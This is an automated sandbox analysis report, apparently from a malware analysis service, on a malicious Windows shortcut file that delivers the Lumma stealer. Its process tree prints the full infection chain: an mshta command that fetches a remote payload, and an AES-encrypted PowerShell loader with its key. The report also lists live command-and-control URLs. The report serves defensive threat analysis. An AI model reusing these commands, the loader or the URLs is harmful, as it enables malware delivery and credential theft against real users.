Analysis
-
max time kernel
147s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
27-02-2024 05:21
Static task
static1
Behavioral task
behavioral1
Sample
707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50.lnk
Resource
win7-20240221-en
General
-
Target
707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50.lnk
-
Size
1KB
-
MD5
c7945d1c593363055616d6e427b8e2a2
-
SHA1
2c5f9b6fc746efb5caad3b31755c801f9ad1ac7b
-
SHA256
707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50
-
SHA512
7fb10ad46450b7ceeebdf3e9144447c59c22c67a6c7d026a1dbebcb665ee6bf1588958c5388e0358f18ecf71539dfd67050bb7ffeb516d2904d5cd77a1786d19
Malware Config
Extracted
https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han
Extracted
lumma
https://executivebrakeji.shop/api
https://technologyenterdo.shop/api
https://detectordiscusser.shop/api
https://turkeyunlikelyofw.shop/api
https://associationokeo.shop/api
Signatures
-
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
Blocklisted process makes network request 3 IoCs
Processes:
mshta.exepowershell.exeflow pid process 14 2300 mshta.exe 18 2300 mshta.exe 20 4440 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exemshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 1 IoCs
Processes:
driver.exepid process 2228 driver.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Users\Admin\Videos\Captures\desktop.ini svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
driver.exedescription pid process target process PID 2228 set thread context of 1624 2228 driver.exe RegAsm.exe -
Drops file in Windows directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\Vss\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
svchost.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString svchost.exe -
Modifies registry class 1 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-609813121-2907144057-1731107329-1000\{95469607-7B9A-455B-8133-0B85F82F9C00} svchost.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 2844 powershell.exe 2844 powershell.exe 4420 powershell.exe 4420 powershell.exe 4440 powershell.exe 4440 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2844 powershell.exe Token: SeDebugPrivilege 4420 powershell.exe Token: SeDebugPrivilege 4440 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
OpenWith.exepid process 3852 OpenWith.exe -
Suspicious use of WriteProcessMemory 25 IoCs
Processes:
cmd.exeforfiles.exepowershell.exemshta.exepowershell.exepowershell.exedriver.exedescription pid process target process PID 2340 wrote to memory of 1956 2340 cmd.exe forfiles.exe PID 2340 wrote to memory of 1956 2340 cmd.exe forfiles.exe PID 1956 wrote to memory of 2844 1956 forfiles.exe powershell.exe PID 1956 wrote to memory of 2844 1956 forfiles.exe powershell.exe PID 2844 wrote to memory of 2300 2844 powershell.exe mshta.exe PID 2844 wrote to memory of 2300 2844 powershell.exe mshta.exe PID 2300 wrote to memory of 4420 2300 mshta.exe powershell.exe PID 2300 wrote to memory of 4420 2300 mshta.exe powershell.exe PID 4420 wrote to memory of 4440 4420 powershell.exe powershell.exe PID 4420 wrote to memory of 4440 4420 powershell.exe powershell.exe PID 4440 wrote to memory of 2228 4440 powershell.exe driver.exe PID 4440 wrote to memory of 2228 4440 powershell.exe driver.exe PID 4440 wrote to memory of 2228 4440 powershell.exe driver.exe PID 2228 wrote to memory of 4500 2228 driver.exe RegAsm.exe PID 2228 wrote to memory of 4500 2228 driver.exe RegAsm.exe PID 2228 wrote to memory of 4500 2228 driver.exe RegAsm.exe PID 2228 wrote to memory of 1624 2228 driver.exe RegAsm.exe PID 2228 wrote to memory of 1624 2228 driver.exe RegAsm.exe PID 2228 wrote to memory of 1624 2228 driver.exe RegAsm.exe PID 2228 wrote to memory of 1624 2228 driver.exe RegAsm.exe PID 2228 wrote to memory of 1624 2228 driver.exe RegAsm.exe PID 2228 wrote to memory of 1624 2228 driver.exe RegAsm.exe PID 2228 wrote to memory of 1624 2228 driver.exe RegAsm.exe PID 2228 wrote to memory of 1624 2228 driver.exe RegAsm.exe PID 2228 wrote to memory of 1624 2228 driver.exe RegAsm.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Windows\System32\forfiles.exe"C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han2⤵
- Suspicious use of WriteProcessMemory
PID:1956 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exestart mshta https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han4⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $xRnrtl = 'AAAAAAAAAAAAAAAAAAAAAD0Af5kmiW2Hnx1ert6ZiHkcrCG5xRw5g+RXkvjSvgaUbk+srbVrOsQgn8toO+hu0Qw1KQj7FAk5xMoqfeLJjMEeamlWrF3FTQ6in6FDMU0esWs41x91rJ/vkrJQOkHUMM2MmLD03n+lBrw2YeIcINOqvu4GIVPjd+Fis/QpUW5Fj8iNCDQy7bTeb/cl1K0KC1ocqAlvj83iKlmuvdzxPum6cIQxLt+2YLh6fmAQocUETi+pQw294/BrcWHiPbCLQ3IVN1QFO/QcDcgmCGGhLZSmlSKvXWS4pkFTnsaeCv0q8qpFQPIbBpzGkWGBKxMJYhQh81lXHyPxeOeFyFq6jqW2vUm+uqMCwX1N5g5UHXYw3Qg4zpyOCq0I5EwoDqzACg0FQ7NLbZAuwhTLK+Yu1JUpq7a86i+FRnVjkA9yOJMjUROJtiOoDNfMdo0ej8BzSKoid4bytekfnZGfb1xfEAyrNCki102wWcJK/vZZFJJQ0EWOmR4qPclxZ3kj3QXa7iwBBn/xEMGg8xE8RDWaHfXHZqdxlpnoKmQX6CchYBPK5Q/alHBAM5gOIN5RcmnQecgz+itBcGKRKac4QUIuYCsTNOGFGvc0/93UPNG9W8OrCD+b24Y2bZP/KolyWolNdjJRHwp4RJAA9iJshbpdMe4n95z2TmNVPEVN28sDZ0kfiJCKpkbu1TkpQNSnY46SLTiZTT3ajO8Sox/hCnztghhj4DMhfQfHJBcMyZ1yynlBM+7lNgUyvioQxQ2KPY7KDi7JTpk1iQYGc+oBvO/fWUMtz9kzyEyxJpOGkwI3MMjDpUYIc9iprfEHj8hpwVdPjhcenIyhZqn28939MlitHffq24shDMzCPgjnU9OWPsMhEKvfu34pU/yjbMkwLHEjcQ==';$PWFaA = 'd0hDTktlemN0SlFHRXFla0Rjb094cnRoUGlSR050VmI=';$rtbrSxS = New-Object 'System.Security.Cryptography.AesManaged';$rtbrSxS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$rtbrSxS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$rtbrSxS.BlockSize = 128;$rtbrSxS.KeySize = 256;$rtbrSxS.Key = [System.Convert]::FromBase64String($PWFaA);$jIXAy = [System.Convert]::FromBase64String($xRnrtl);$rSpXWojt = $jIXAy[0..15];$rtbrSxS.IV = $rSpXWojt;$mXooDLjjw = $rtbrSxS.CreateDecryptor();$KHnzkbgXQ = $mXooDLjjw.TransformFinalBlock($jIXAy, 16, $jIXAy.Length - 16);$rtbrSxS.Dispose();$iIauy = New-Object System.IO.MemoryStream( , $KHnzkbgXQ );$Izyrh = New-Object System.IO.MemoryStream;$thcRRYmqg = New-Object System.IO.Compression.GzipStream $iIauy, ([IO.Compression.CompressionMode]::Decompress);$thcRRYmqg.CopyTo( $Izyrh );$thcRRYmqg.Close();$iIauy.Close();[byte[]] $QWoIKfh = $Izyrh.ToArray();$KKSHrJAF = [System.Text.Encoding]::UTF8.GetString($QWoIKfh);$KKSHrJAF | powershell -5⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4420 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -6⤵
- UAC bypass
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4440 -
C:\Users\Admin\AppData\Roaming\driver.exe"C:\Users\Admin\AppData\Roaming\driver.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"8⤵PID:4500
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"8⤵PID:1624
-
-
-
-
-
-
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:3852
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService1⤵
- Drops desktop.ini file(s)
- Checks processor information in registry
- Modifies registry class
PID:4864
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
64B
MD5feadc4e1a70c13480ef147aca0c47bc0
SHA1d7a5084c93842a290b24dacec0cd3904c2266819
SHA2565b4f1fe7ba74b245b6368dbe4ceffa438f14eef08ba270e9a13c57505c7717ac
SHA512c9681a19c773891808fefa9445cea598d118c83bba89530a51ab993adbff39bce72b43f8e99d0c68e4a44f7e0f4c8ec128641c45cd557a8e1215721d5d992a23
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
297KB
MD579ac171749690f2c947187e34d2b007d
SHA1ebe8d99c87b7b6b51af10a1260271f7282c8f8d2
SHA256cdb5f26a44a64a81c8e96db60ba2f4471f88b3980d14f91d3247a0afde34d441
SHA512c93009d5e20a8ac008e409ad677674aeacc383f0716904825847330ad12ea7347d706754f9c8724e69c0261f2edcb36a41e40f851014e51021b1bccbf7a15f54
-
Filesize
274KB
MD545ff32c8f82fd612116ebd1b20fa1c19
SHA1de91cdfa4b34d5526b2d99ad2cdd9f6e465b205e
SHA256864ed84452a92ae76f154f7abc10540674d5d4490c7c5202329c765ee80c3ae2
SHA512e0fe7ec8bd84b32d352f9866339b8a589b8c95ec830d3b949162aa752e0f6cb74f9ec904493a727702b471226fdc156658319165443bc4faddabe837365f2992
-
Filesize
190B
MD5b0d27eaec71f1cd73b015f5ceeb15f9d
SHA162264f8b5c2f5034a1e4143df6e8c787165fbc2f
SHA25686d9f822aeb989755fac82929e8db369b3f5f04117ef96fd76e3d5f920a501d2
SHA5127b5c9783a0a14b600b156825639d24cbbc000f5066c48ce9fecc195255603fc55129aaaca336d7ce6ad4e941d5492b756562f2c7a1d151fcfc2dabac76f3946c